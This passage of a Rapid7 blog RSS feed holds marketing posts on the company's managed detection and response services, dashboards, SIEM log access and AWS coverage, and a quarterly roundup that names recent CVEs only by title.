machine learning to supplement missing CVSS scores and ensure an immediate, accurate risk rating for all <a href="/fundamentals/common-vulnerabilities-and-exposures-cve/">CVEs</a> without manual analysis.</p><p>This AI/ML scoring ensures all vulnerabilities are properly assessed, helping you prioritize remediation efforts efficiently and strengthen your overall security posture with the right context and insights. Discover more about AI-driven CVSS Scoring <a href="/blog/post/2025/02/19/rapid7-fills-gaps-in-the-cve-assessment-process-with-ai-generated-vulnerability-scoring-in-exposure-command/">here</a>.</p><figure><img src="/content/images/2025/03/Screenshot-2025-03-31-at-9.42.40-AM.png" captionAttrs="[object Object]" caption="CVSS Risk Scoring in InsightVM" width="auto" style="width: auto; height: auto;" /><figcaption>CVSS Risk Scoring in InsightVM</figcaption></figure><h3>Prioritize risk and accelerate remediation of critical exposures</h3><p>To effectively prioritize remediation efforts and reduce cyber risk, you need clear contextual information about your assets and vulnerabilities. Without this, you risk misclassifying the severity of vulnerabilities and wasting effort on low-priority issues while high-risk threats remain unaddressed.</p><p>Our newly expanded <a href="/products/command/attack-surface-management-asm/">Surface Command</a> and Remediation Hub integration embeds this necessary context about assets and vulnerabilities directly within the asset inventory and detail pages of Surface Command, providing:</p><ul><li>Faster mean-time-to-remediate (MTTR) by bringing prioritized remediation guidance directly to the pages your team is already working within in Surface Command.</li><li>Deeper asset context at the time of remediation, including insights from third-party security and ITOps tooling.</li><li>Improved collaboration by providing security teams and stakeholders with enriched context for quicker decision-making.</li></ul><p>Learn more about how this integration can empower your team to act with confidence, ensuring that remediation efforts are focused on the vulnerabilities that matter most <a href="https://docs.rapid7.com/insightvm/remediation-hub/">here</a>.</p><h2>MDR: A clear line of sight</h2><h3>New detection and response dashboard</h3><p>Teams need a holistic view of threats, SOC activity, and response performance to have confidence in their program and communicate efficacy to leadership and stakeholders. Available for Managed Detection and Response customers, our new customizable Detection & Response Dashboard provides an executive-ready snapshot of your MDR program, offering real-time, easy-to-communicate insights into:<br/></p><ul><li><strong>Threat prioritization & alert trends</strong>: Analyze the volume of alerts by severity and identify the most common alert types to understand the highest-risk threats.</li><li><strong>Incident response efficiency</strong>: Threat pipeline visualization tracks how alerts progress to investigations and incidents, while mean time to begin investigating highlights response speed.</li><li><strong>Investigation & resolution metrics</strong>: Insights into closed alerts and investigations by priority and disposition help teams assess the effectiveness of their threat response and remediation efforts​.</li></ul><figure><img src="/content/images/2025/03/Screenshot-2025-03-31-at-9.44.18-AM.png" captionAttrs="[object Object]" caption="Detection and Response Dashboard in Rapid7 MDR" width="auto" style="width: auto; height: auto;" /><figcaption>Detection and Response Dashboard in Rapid7 MDR</figcaption></figure><p>Learn more about the dashboard in <a href="/blog/post/2025/03/31/seeing-is-securing-mdr-value-at-a-glance-with-the-detection-response-dashboard/">our blog</a>.</p><h3>Transparency in AI-driven security: AI Alert Triage decisioning</h3><p>Artificial intelligence (AI) has transformed security operations, enabling faster detection and response. However, black-box AI decision-making can lead to uncertainty—why was an alert escalated or dismissed?</p><p>With Rapid7’s AI Alert Triage Transparency, MDR customers gain full visibility into the reasoning behind AI-driven security actions​, such as what factors influenced alert prioritization. You’ll also benefit from Rapid7’s AI triage’s 99.89% accuracy, reducing noise and giving you more time to focus on investigating real threats. Learn more about what this means for your organization <a href="/blog/post/2025/03/11/helping-us-help-you-practical-applications-of-ai-in-the-soc/">here</a>.</p><figure><img src="/content/images/2025/04/image--7-.png" captionAttrs="[object Object]" caption="AI-Powered Auto Triage in Rapid7 MDR" width="auto" style="width: auto; height: auto;" /><figcaption>AI-Powered Auto Triage in Rapid7 MDR</figcaption></figure><h2>The latest intelligence from Rapid7 Labs</h2><h3>Emergent threat response: Real-time guidance for critical threats</h3><p>Rapid7’s Emergent Threat Response (ETR) program from <a href="/research/">Rapid7 Labs</a> delivers fast, expert analysis and first-rate security content for the highest-priority security threats to help both Rapid7 customers and the greater security community understand their exposure and act quickly to defend their networks against rising threats. </p><p>In Q1 2025, Rapid7’s ETR team provided expert analysis, InsightVM content, and mitigation guidance for a variety of notable vulnerabilities, including several that came under active attack. Q1 CVEs of note include:<br/></p><ul><li><a href="/blog/post/2025/03/25/etr-multiple-vulnerabilities-in-ingress-nginx-controller-for-kubernetes/">CVE-2025-1974, CVE-2025-24514, CVE-2025-1097, CVE-2025-1098, CVE-2025-24513</a>: Multiple vulnerabilities in Ingress NGINX Controller for Kubernetes</li><li><a href="/blog/post/2025/03/25/etr-notable-vulnerabilities-in-next-js-cve-2025-29927/">CVE-2025-29927</a>: Notable vulnerabilities in Next.js (CVE-2025-29927) and CrushFTP</li><li><a href="/blog/post/2025/03/19/etr-critical-veeam-backup-and-replication-cve-2025-23120/">CVE-2025-23120</a>: Critical Veeam Backup & Replication RCE</li><li><a href="/blog/post/2025/03/19/etr-apache-tomcat-cve-2025-24813-what-you-need-to-know/">CVE-2025-24813</a>: Apache Tomcat RCE (low exploitability)</li><li><a href="/blog/post/2025/03/04/etr-multiple-zero-day-vulnerabilities-in-broadcom-vmware-esxi-and-other-products/">CVE-2025-22224, CVE-2025-22225, CVE-2025-22226</a>: Multiple zero-day vulnerabilities in Broadcom VMware ESXi and other products</li><li><a href="/blog/post/2025/01/16/etr-fortinet-firewalls-hit-with-new-zero-day-attack-older-data-leak/">CVE-2024-55591</a>: Zero-day exploitation of Fortinet FortiOS</li><li><a href="/blog/post/2025/01/08/etr-cve-2025-0282-ivanti-connect-secure-zero-day-exploited-in-the-wild/">CVE-2025-0282</a>: Zero-day exploitation of Ivanti Connect Secure</li></ul><p>Follow along <a href="/blog/series/emergent-threats/emergent-threats/">here</a> to see the latest emergent threat guidance from our team.</p><h3>Technical assessments of CVEs in AttackerKB</h3><p>This past quarter Rapid7 researchers also published additional vulnerability assessments in <a href="https://attackerkb.com/">AttackerKB</a> (Rapid7’s community platform for vulnerability research and threat data) to help customers and the community understand and prioritize notable CVEs:</p><ul><li><a href="https://attackerkb.com/topics/UM2s9nB7k4/cve-2024-12084/rapid7-analysis">CVE-2024-12084</a>: Heap-based buffer overflow in Rsync</li><li><a href="https://attackerkb.com/assessments/951efdb5-288e-4608-8bde-667656782321">CVE-2025-0108</a>: Path confusion vulnerability in Palo Alto Networks PAN-OS web service</li><li><a href="https://attackerkb.com/assessments/1711e1d9-4407-4c28-ae4e-379952e65026">CVE-2024-57727</a>: Unauthenticated path traversal in SimpleHelp RMM</li></ul><h3>Coordinated vulnerability disclosure</h3><p>In February 2025, Rapid7 researchers discovered a novel vulnerability in PostgreSQL (now assigned CVE-2025-1094) while researching BeyondTrust CVE-2024-12356, which was exploited as a zero-day flaw in a high-profile attack on the U.S. Treasury Department. </p><p>In every scenario Rapid7 researchers tested, a successful exploit for BeyondTrust CVE-2024-12356 had to include exploitation of PostgreSQL CVE-2025-1094 in order to achieve remote code execution. See Rapid7’s full analysis of CVE-2024-12356 <a href="https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis">here</a> and our disclosure of PostgreSQL CVE-2025-1094 <a href="/blog/post/2025/02/13/cve-2025-1094-postgresql-psql-sql-injection-fixed/">here</a>.</p><h2>Stay tuned for more!</h2><p>As always, we’re continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and <a href="https://docs.rapid7.com/release-notes/">release notes</a> as we continue to highlight the latest in product and service investments at Rapid7.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/04/01/whats-new-in-rapid7-products-services-q1-2025-in-review</link>
      <guid isPermaLink="false">blte5214fd945e12240</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Margaret Wei]]></dc:creator>
      <pubDate>Tue, 01 Apr 2025 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt895aa4b6ddc34ea9/683de3da3e68ee6b3c889aa2/gettyimages-2012415789.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Seeing is Securing: MDR VALUE at-a-glance with the Detection and Response Dashboard]]></title>
      <description><![CDATA[<p>Transparency is core to <a href="/services/managed-detection-and-response-mdr/">Managed Detection & Response (MDR)</a>. It’s necessary between Rapid7 and our customers as we conduct security operations on their behalf. And it’s necessary for our customers to communicate transparently and effectively with their stakeholders.</p><p>Scroll on – because there’s a new executive-level MDR performance dashboard that delivers it.</p><h2>Just the right amount of information</h2><p>Every day, our four global SOCs analyze and triage thousands of alerts – investigating incidents, informing remediation actions, and quarantining breached endpoints. This activity is then translated into strategic guidance by dedicated Cybersecurity Advisors, ensuring security leaders have the insights they need to stay ahead of threats.</p><p>To deliver on that commitment to transparency, we ensure that all of this activity takes place in <a href="/products/insightidr/">InsightIDR</a>, our next-gen SIEM and XDR platform that gives MDR customers a direct line of sight into security activity, logs, detections, and their security posture. You see what the SOC sees – every detection, alert, investigation, and response action across your environment.</p><p>To keep pace with the speed of modern adversaries and realize the value of their MDR program, security teams need a high-level, executive-ready snapshot that showcases program effectiveness, surfaces key trends, and enables informed decision-making.</p><h2>Enter the Detection and Response Dashboard</h2><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXdRDRMv3tVjRgB4CMkw17SMd3a5bddvovkKMb1kSTECFHfjrXhqTcCIeCIzMI7ErxHGC8LNZPyRn7agMgHzu2lDm56QM7rJVL0insj3K6bbJZKRU5-re6MX8Z-m0RioOfcaxKXF0g?key=QG7TNlVYDieuDg5clkFsQkzP" width="auto" style="width: auto; height: auto;" /><h3><br/>A holistic view of your MDR program</h3><p>The <strong>Detection and Response Dashboard</strong> provides a clear, high-level snapshot of your entire MDR program. The customizable and downloadable summary visualizes key metrics, helping teams quickly identify risks, trends, and security outcomes.</p><h3>Clarity on How the SOC is Working for You</h3><p>Designed to give security teams an at-a-glance understanding of how their MDR program is performing – breaking down everything from SOC activity and detection trends to response times and containment actions – the Dashboard distills the thousands of alerts and SOC activity that I mentioned earlier.</p><p>Offering a transparent lens into the day-to-day operations of Rapid7’s global SOCs, customers are given confidence in the behind-the-scenes work driving their MDR program. Instead of wondering whether threats are being seen or how decisions are made, customers can see the operational heartbeat of their service: what’s being triaged, when the SOC steps in, and how investigations unfold over time. This level of visibility helps customers trace the lifecycle of real threats through the eyes of the SOC — from detection to action — while also revealing patterns in analyst activity, responsiveness, and escalation. It bridges the gap between outsourced operations and internal accountability, allowing security teams to not only report on what’s being done, but understand how it’s being done and why.</p><h3>Visualize and Understand Threat Trends Over Time</h3><p>Threats don’t just appear and disappear – they evolve, shifting tactics and targeting different areas of your environment. The Detection and Response Dashboard surfaces key trends in the alerts and investigations processed by the SOC, mapping out attacker behaviors and identifying the most frequently targeted assets. By tracking how threats develop and where adversaries are focusing their efforts, security teams can better anticipate emerging risks and validate the impact of their security investments.</p><p>Security teams can use view and download summary information including:</p><ul><li><strong>Threat Prioritization & Alert Trends</strong>: Analyze the volume of alerts by severity and identify the most common alert types to understand the highest-risk threats.</li><li><strong>Incident Response Efficiency</strong>: Threat pipeline visualization tracks how alerts progress to investigations and incidents, while mean time to begin investigating highlights response speed.</li><li><strong>Investigation & Resolution Metrics</strong>: Insights into closed alerts and investigations by priority and disposition help teams assess the effectiveness of their threat response and remediation efforts​.</li></ul><p>For highly mature security teams, this level of insight offers a data-driven foundation for evolving defenses and prioritizing resources based on real-world threat activity. At the same time, the Dashboard remains accessible for teams earlier in their security journey, providing a clear, digestible view of security trends without overwhelming technical detail.</p><h3>Demonstrate Your Security Program’s Value Internally</h3><p>Proving the impact of a security program isn’t just about responding to threats – it’s about showcasing measurable progress. The Detection and Response Dashboard translates raw security data into compelling, digestible visuals, making it easier to communicate security performance to stakeholders at all levels.</p><p>By presenting security outcomes in a way that resonates across both technical and executive audiences, the Dashboardenables teams to align more effectively with IT and business leaders. This ensures that security investments and priorities are grounded in real data, not assumptions. And as MDR customers expand their security programs, integration with Asset Discovery allows teams to identify hidden assets and weave risk-aware insights directly into their broader security strategy.</p><h2>The Next Step of ‘Seeing is Securing’ is Here</h2><p>It’s now easier than ever to understand, track, and communicate the full scope and value of your security operations through your partnership with the Rapid7 SOC. If you’re not yet leveraging our MDR, you’re missing out on the most comprehensive approach to 24/7 SOC expertise, risk-aware threat detection, and unlimited incident response. Learn more about how Rapid7 MDR can strengthen your security program – <a href="/services/managed-detection-and-response-mdr/">get the details here</a>.</p><p><br/></p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/03/31/seeing-is-securing-mdr-value-at-a-glance-with-the-detection-response-dashboard</link>
      <guid isPermaLink="false">blt2229910294977fb7</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[Security Operations (SOC)]]></category><dc:creator><![CDATA[Conner Goldstein]]></dc:creator>
      <pubDate>Mon, 31 Mar 2025 13:01:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd4aad49e3e7376e0/683de1d2bc38b155f7477d5d/gettyimages-2154830323.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Why MDR In 2025 Is About Scaling With Purpose]]></title>
      <description><![CDATA[<p>Forrester recently released “The Forrester Wave™: Managed Detection and Response (MDR) Services, Q1 2025,", highlighting the top 10 MDR providers out of more than 600 worldwide. While we’re honored to be recognized in such a competitive market, Rapid7’s designation underscores a fundamental difference in perspective: our customers consistently tell us that their top priority is cost-effective, comprehensive security operations at scale. They need contextually risk-aware attack surface visibility and protection without incurring exorbitant expenses, and that is precisely where we excel.</p><h2>Our Mission: Monitor 100% Of What Matters—Affordably</h2><p>The Wave places a premium on detection engineering and coverage breadth. We agree that those factors matter, but for most organizations, success lies in balancing coverage breadth and depth, seamless scalability, and cost constraints. You shouldn't ingest data for the sake of it—doing so drives spiraling costs and complexity. Instead, you need measured, focused monitoring of the specific data that impacts your risk profile.</p><p>What sets Rapid7 apart is our deeper understanding of the attack surface—we collect and integrate more data about the state of each customer’s environment than any other MDR provider. By honing in on meaningful, high-fidelity sources rather than chasing noise, our platform minimizes false positives and unnecessary overhead, ensuring you get the best possible visibility.</p><h2>A Deeply Integrated Approach: The Key To Scalable Security</h2><p>Modern security operations demand an ecosystem that brings together data from not only your endpoints, but also your networks, clouds, identities, and third-party tools—without a budget meltdown. <a href="/platform/">Rapid7’s Command Platform</a> was built precisely for this purpose, anchoring on our Next-Gen SIEM and a flexible architecture that is both data-rich and cost-conscious.</p><p>Uniquely, we deliver a fully integrated MDR experience from end to end:</p><ul><li><strong>Native SIEM Capabilities</strong>: Our platform correlates data across multiple attack surfaces, from the endpoint to the cloud, natively and in real time.</li><li><strong>Deep Tech Synergy</strong>: The same models that power our vulnerability management and attack surface analytics fuel our MDR, so you gain actionable insights without juggling multiple, disconnected vendors.</li><li><strong>In-Platform Partnership, Faster Resolution</strong>: Collaborate directly within the Command Platform with security veterans from our global SOC to augment internal teams and  accelerate investigations, reduce time to remediation, and build long-term resilience.</li></ul><h2>People + AI-Driven Efficiency: More Than Just Buzzwords</h2><p>At Rapid7, AI isn’t a marketing tagline. We take a deliberate, responsible approach to AI and ML, building AI to power tangible improvements for our customers:</p><ul><li><strong>Faster, High-Fidelity Detections</strong>: Through machine learning on massive volumes of behavioral data, we pinpoint real threats quickly and effectively.</li><li><strong>Enhanced Analyst Experience: </strong>Our AI-assisted investigations spotlight suspicious activity, giving our team immediate, context-rich information that saves you from chasing endless false positives.</li><li><strong>Transparent Partnership</strong>:We don’t hide behind a “black box.” Our security analysts operate out of the same platform and share their findings with you in real time—creating a genuinely collaborative environment rather than an outsourced service.</li></ul><h2>Going Beyond The Wave: A Blueprint For Resilient Security</h2><ul><li><strong>A True Partnership Model, Including Unlimited Incident Response</strong>: Our team acts as an extension of your own, giving you full-scale incident support at no extra cost. Security emergencies don’t respect budget approvals, so neither do we.</li><li><strong>Unparalleled Insight Into The Attack Surface</strong>: We combine comprehensive visibility (both external and internal) with continual intelligence on attacker techniques, providing deeper context on potential exposures. Stay tuned for more announcements in this area.</li><li><strong>Community Focus</strong>: Rapid7 proudly supports the broader cybersecurity community through key open-source projects like Metasploit and Velociraptor, keeping us close to innovative researchers and practitioners worldwide.</li></ul><h2>What’s Next: Continued MDR Innovation</h2><p>We recognize some organizations may look at our placement in the Wave and wonder about Rapid7’s future roadmap. Rest assured, we’re just getting started:</p><ul><li><strong>Extended Cloud & Identity Threat Coverage</strong>: From AWS to Azure to Google Cloud—and major identity platforms—we’re broadening our detection capabilities to reflect attackers’ evolving tactics.</li><li><strong>AI-Driven SOC Investments</strong>: Our upcoming releases significantly reduce alert noise and speed up investigations, leveraging context-based <a href="/platform/threat-intelligence-tip/">threat intelligence</a> tailored to your specific environment.</li><li><strong>Deeper Integrations and Partnerships</strong>: We’ll continue building alliances with leading technologies so your existing tools—alongside our Command Platform—deliver holistic security without the bloat.</li><li><strong>See and Secure Your Attack Surface</strong>: Upcoming releases deepen our visibility into customer environments to secure the entire digital estate.</li></ul><p>These enhancements begin rolling out next month, and we can’t wait to share how they further advance automated detection, rapid response, and proactive risk mitigation.</p><h2>The Bottom Line: Effective, Affordable, and Scalable MDR</h2><p>We prioritize what we know customers need. We’re focused on delivering a scalable, cost-effective MDR service that partners deeply with your team to optimize long-term resilience. If you need MDR that goes far beyond just the endpoint and beyond just outsourced alerting—and want to maintain your budget without sacrificing innovation—Rapid7 stands ready to transform your security operations.</p><p>Ready to explore how Rapid7 MDR can fit your needs?<br/>Check out our <a href="/services/managed-detection-and-response-mdr/demo/">Managed Threat Complete</a> solution, <a href="/services/managed-detection-and-response-mdr/enterprise/">MDR for Enterprise</a>, or reach out to our team to learn how we can help scale your success. Let’s move past the checkbox approach to MDR—together.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/02/27/why-mdr-in-2025-is-about-scaling-with-purpose</link>
      <guid isPermaLink="false">blt2df72de9c1236c06</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[Managed Threat Complete]]></category>
      <category><![CDATA[Forrester Wave]]></category><dc:creator><![CDATA[Craig Adams]]></dc:creator>
      <pubDate>Thu, 27 Feb 2025 14:44:58 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9b16eaccd0675c91/683ddc893a1c5aa5354ba74a/gettyimages-1828036562.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[MDR + SIEM: Why Full Access to Your Security Logs is Non-Negotiable]]></title>
      <description><![CDATA[<p>Many <a href="/fundamentals/what-is-managed-detection-and-response-mdr/">Managed Detection and Response (MDR)</a> providers promise world-class <a href="/fundamentals/threat-detection/">threat detection</a>, but behind the scenes they lock away your security logs, limiting your visibility and control. It’s your data — so why don’t you have full access to it? Isn’t the whole point of security to see everything happening in your environment? Without full access to your own data, you’re left dependent on their tools, their timelines, and their interpretations of security events.</p><p>This isn’t just an inconvenience — it’s a risk.</p><p>Pairing MDR with a <a href="/fundamentals/siem/">Security Information and Event Management (SIEM)</a> solution ensures complete transparency, enabling real-time investigation, historical <a href="/fundamentals/what-is-threat-hunting/">threat hunting</a>, compliance readiness, and deeper threat insights. If you don’t have full access to your security logs, you’re not truly in control of your cybersecurity strategy. And in today’s high-stakes environment, that’s simply not an option.</p><p>With <a href="/services/managed-detection-and-response-mdr/">Rapid7 MDR</a>, you don’t just gain a service — you gain full access and control over your data, unlocking significant advantages for compliance, long-term strategy, and cross-platform analytics.</p><h2>The Benefits of Owning your Data</h2><p>When it comes to cybersecurity, data is everything. Logs, events, and alerts are the building blocks of threat detection, incident response, and forensic investigations. Owning your data, particularly with Rapid7’s 13-month data retention, empowers you in ways that vendor-locked solutions cannot match. Here’s how:</p><ul><li><strong>Cross-platform analytics</strong><br/>Modern security teams operate across cloud, hybrid, and on-prem environments. Owning your data means you can integrate security telemetry across platforms, enabling immediate answers and deeper correlations between systems for accurate threat detection.</li><li><strong>Compliance made easier</strong><br/>Many industries require businesses to retain data for specific periods to meet regulatory standards such as GDPR, HIPAA, or PCI DSS. Rapid7’s extended data retention ensures you’re always audit-ready and compliant without relying on third-party intermediaries for log retrieval.</li><li><strong>Historical threat hunting and forensics</strong><br/>Cyber threats evolve over time — sometimes laying dormant for months to manifest into an attack. With 13 months of historical data, the MDR service can trace attack patterns, uncover dormant threats, and conduct deep-dive forensic investigations to prevent repeat breaches. Advanced threats don’t just appear out of nowhere — long-term attack campaigns require long-term visibility. If you don’t know how an attacker got in, how can you ensure they won’t come back?</li></ul><h2>The hidden risks of limited data access</h2><p>Many MDR providers operate in a “black box” model, where security data is siloed within their systems, restricting user access and limiting independent investigations. This lack of transparency not only creates dependency on the vendor but can also lead to serious security and operational risks:</p><ul><li><strong>Slower incident response</strong><br/>Seconds matter when attackers are inside your environment. Security teams can waste critical time waiting for an MDR provider to retrieve logs or investigate issues, delaying decisive action during <a href="/fundamentals/types-of-attacks/">cyberattacks</a>.</li><li><strong>Reduced security visibility</strong> <br/>Cyber threats don’t operate in isolation. Without full data access, security teams miss critical patterns, struggle to correlate events, and lose the ability to conduct independent investigations. The result? A weakened security posture and increased attack exposure.</li><li><strong>Hindered cross-team collaboration</strong><br/>Security isn’t just a SOC function — it requires collaboration with IT, compliance, risk, and leadership teams. When data is locked behind an MDR provider’s system, security teams cannot share insights or validate threats with other departments effectively. This slows down decision-making, creates blind spots across IT infrastructure, and reduces the organization’s ability to work as a unified team in responding to threats.</li><li><strong>Compliance gaps</strong><br/>If an organization cannot independently access its logs, it may struggle to provide auditors with the necessary evidence for compliance frameworks like GDPR, HIPAA, DORA, NIS2, or PCI DSS.</li></ul><h2>Rapid7 MDR: Transparency and control</h2><p>Rapid7’s MDR service offers transparent and unrestricted access to your data through <a href="/products/insightidr/">InsightIDR</a>, our cloud-native, next-gen SIEM built for both detection and response. Unlike traditional SIEMs that focus solely on log aggregation, InsightIDR actively identifies and prioritizes real threats by analyzing user and attacker behavior, leveraging <a href="/fundamentals/deception-technology/">deception technology</a>, and utilizing built-in <a href="/fundamentals/what-is-threat-intelligence/">threat intelligence</a>. This ensures not only full visibility but also rapid detection and response to advanced threats, helping security teams act faster. With Rapid7, you get:</p><ul><li><strong>Real-time insights</strong>: Monitor and analyze security data in real-time for faster response to threats — no waiting for vendor-controlled access.</li><li><strong>Custom dashboards</strong>: Rapid7’s dashboards support operational and executive reporting, making it easier for security teams to collaborate with IT, compliance, and leadership on security progress, priorities, and effectiveness.</li><li><strong>Custom detections:</strong>  Security teams can create tailored detections across any data sent to InsightIDR based on their specific infrastructure, threat models, and business needs. This ensures that critical anomalies and suspicious behaviors don’t get lost in generic detection rules.</li><li><strong>Complete transparency</strong>: Audit every action taken by Rapid7 analysts and your SOC team plus see investigations and comments for transparency and collaboration.</li></ul><h2>Command the SIEM advantage: Context and correlation matter</h2><p>A key differentiator of Rapid7 MDR is that InsightIDR is more than just a SIEM — it’s a next-gen detection and response platform. Many MDR solutions provide basic alerting but lack the advanced behavioral analytics and automated response capabilities of InsightIDR. By combining SIEM, user behavior analytics, deception technology, and automated response orchestration, InsightIDR proactively detects threats, correlates events across your environment, and enables faster, more precise response actions.</p><p>Without a SIEM, organizations struggle with:</p><ul><li><strong>Limited visibility into user behavior,</strong> making it harder to detect insider threats or compromised accounts.</li><li><strong>No long-term correlation of security events, </strong>reducing the ability to uncover sophisticated, multi-stage attacks.</li><li><strong>Gaps in historical threat hunting, </strong>restricting security teams from investigating past incidents, identifying trends, and improving future defenses.</li></ul><p>With InsightIDR, Rapid7 MDR goes beyond detection — it  provides comprehensive context, automation, and deep forensic capabilities that elevate an organization’s security maturity.</p><h2>Take back command of your security data</h2><p>In a world where vendor lock-in is common, maintaining ownership and access to your security data is not just a convenience, it’s a necessity. Without it, organizations risk compliance failures, slower response times, and reduced visibility into their own security posture.</p><p>With Rapid7 MDR, you’re not just subscribing to a service — you’re gaining a proactive security partner. You get unrestricted access, 13-month data retention, and real-time threat detection and response — ensuring compliance, faster incident containment, and smarter security decisions powered by InsightIDR’s built-in detection capabilities.</p><p>Don’t settle for an MDR solution that keeps you in the dark. Choose an approach that empowers your security team with full access and control over your data.</p><p><strong>Ready to experience the difference? </strong><a href="/services/managed-detection-and-response-mdr/"><strong>Learn more about Rapid7 MDR today</strong></a><strong>.</strong></p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/02/26/mdr-siem-why-full-access-to-your-security-logs-is-non-negotiable</link>
      <guid isPermaLink="false">blt18676f529be0c800</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[SIEM]]></category><dc:creator><![CDATA[René Fusco]]></dc:creator>
      <pubDate>Wed, 26 Feb 2025 17:03:16 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt17ac66d65da84273/683de60818a5532ea268722c/gettyimages-1139805781.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Securing Success: Stories from the SOC Webinar Series]]></title>
      <description><![CDATA[<p>In today’s fast-paced threat landscape, SOC (Security Operations Center) teams are under relentless pressure. Cyberattacks are evolving, threat volumes are skyrocketing, and attackers are exploiting vulnerabilities faster than ever. To navigate these challenges, Rapid7 has launched the <strong>"Securing Success: Stories from the SOC"</strong> webinar series.</p><p>This three-part series provides practical insights, expert advice, and actionable strategies for SOC teams. Featuring Rapid7’s leading experts and real-world case studies, the series covers everything from tackling incidents to building long-term resilience in your SOC.</p><h2>Why Watch? Key Insights from the Series</h2><h3>Webinar 1: Securing Success: Spotlight on the SOC</h3><p>Kicking off the series, this webinar offers a behind-the-scenes look at Rapid7’s SOC data and incident trends. Learn how attackers are leveraging cloud misconfigurations, exploiting vulnerabilities, and bypassing MFA. The session highlights actionable steps to detect these threats earlier and optimize your defenses.<br/><a href="https://www.brighttalk.com/webcast/10457/606980?utm_source=Rapid7?utm_source=blog&amp;utm_medium=website&amp;utm_content=soc-series-webcast&amp;utm_campaign=global-mdr-campaign-blogs-prospect-eng"><strong>Watch the Webinar</strong></a></p><h3>Webinar 2: Securing Success: Unlimited Incident Response</h3><p>Dive into an in-depth case study of a ransomware attack and explore how Rapid7’s unlimited incident response service empowers teams to contain and recover from attacks. Discover the importance of leveraging tools like Velociraptor for forensic investigation, implementing robust containment measures, and prioritizing response actions to mitigate impact.<br/><a href="https://www.brighttalk.com/webcast/10457/607019?utm_source=Rapid7?utm_source=blog&amp;utm_medium=website&amp;utm_content=soc-series-webcast&amp;utm_campaign=global-mdr-campaign-blogs-prospect-eng"><strong>Watch the Webinar</strong></a></p><h3>Webinar 3: Securing Success: Strengthening Your SOC</h3><p>In the series finale, Rapid7’s top experts, including Jaya Baloo and Raj Samani, address how to enhance SOC operations amidst rising attack volumes and evolving threats. From prioritizing vulnerabilities to leveraging curated threat intelligence, this session equips you with the strategies needed to strengthen your SOC and prepare for the future.<br/><a href="https://www.brighttalk.com/webcast/10457/607030?utm_source=Rapid7?utm_source=blog&amp;utm_medium=website&amp;utm_content=soc-series-webcast&amp;utm_campaign=global-mdr-campaign-blogs-prospect-eng"><strong>Watch the Webinar</strong></a></p><h2>Real Stories, Real Solutions</h2><p>Each session delivers actionable insights through real-world examples and expert guidance:</p><ul><li><strong>Improving Detection and Response:</strong> Learn how to identify attackers earlier by addressing common access methods like phishing, cloud misconfigurations, and unpatched vulnerabilities.</li><li><strong>Streamlining Incident Response:</strong> Explore Rapid7’s methodologies for tackling complex incidents, ensuring swift containment, and preventing future breaches.</li><li><strong>Building a Resilient SOC:</strong> Discover how threat intelligence, prioritization, and collaboration can help your team focus on what truly matters.</li></ul><h2>Take the Next Step in Protecting Your Organization</h2><p>Your attack surface is growing, and defending it requires the right tools and the right team of experts by your side. Learn how <strong>Rapid7’s Managed Detection & Response</strong> can help your organization unify total risk and threat coverage and keep you secure around the clock.</p><p>Amplify your SOC with the insights and tools to outsmart emerging threats, zero-in on the high fidelity signals that threaten your organization, and expertly respond around the clock. Discover how to take command with <a href="/services/managed-detection-and-response-mdr/"><strong>Managed Threat Complete</strong></a> here.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/01/10/securing-success-stories-from-the-soc-webinar-series</link>
      <guid isPermaLink="false">blt02191ae46c67178a</guid>
      <category><![CDATA[Security Operations (SOC)]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Emma Burdett]]></dc:creator>
      <pubDate>Fri, 10 Jan 2025 17:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcab4a0047178377b/683ddd2a18a5534f47686eeb/GettyImages-1448456712.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Expanded SOC Coverage Into AWS Environments with Rapid7 MXDR]]></title>
      <description><![CDATA[<h3><em>Co-athored by Mikayla Wyman and Ryan Blanchard</em></h3><p>As organizations increasingly rely on AWS for scalability and innovation, the complexity of securing these environments grows. AWS offers a robust set of native services and a comprehensive ecosystem, but managing security signals and responding to threats across dynamic workloads can overwhelm even the most well-equipped teams.</p><p>Rapid7’s <a href="/services/managed-detection-and-response-mdr/">Managed Extended Detection and Response (MXDR) service</a> has focused on helping customers bridge this gap, unifying security telemetry from major cloud service providers including AWS and Azure, with expert-driven detection and response. With MXDR, organizations can confidently scale their cloud investments without sacrificing the comprehensive coverage they’re familiar with today.</p><h2>Tailored to AWS Workloads and Modern Cloud Security Challenges</h2><p>MXDR delivers the context and coverage needed to handle complex threats in AWS environments, providing a purpose-built service to address the specific challenges of securing modern cloud environments. With the extension of MXDR for AWS, teams can tailor their Rapid7 MXDR support to include triage, investigation, and response for critical GuardDuty alerts directly within their MDR service.</p><p>Layering native AWS telemetry with insights from other tools and environments creates a centralized, unified view of your security posture. With this context, our team is able to tailor protections and actions to the unique needs of your environment, safeguarding your assets more effectively against evolving threats. This comprehensive perspective empowers Rapid7 MDR analysts to operate at peak efficiency, ensuring your organization experiences a robust incident response lifecycle, from initial detection and alert triage to containment and 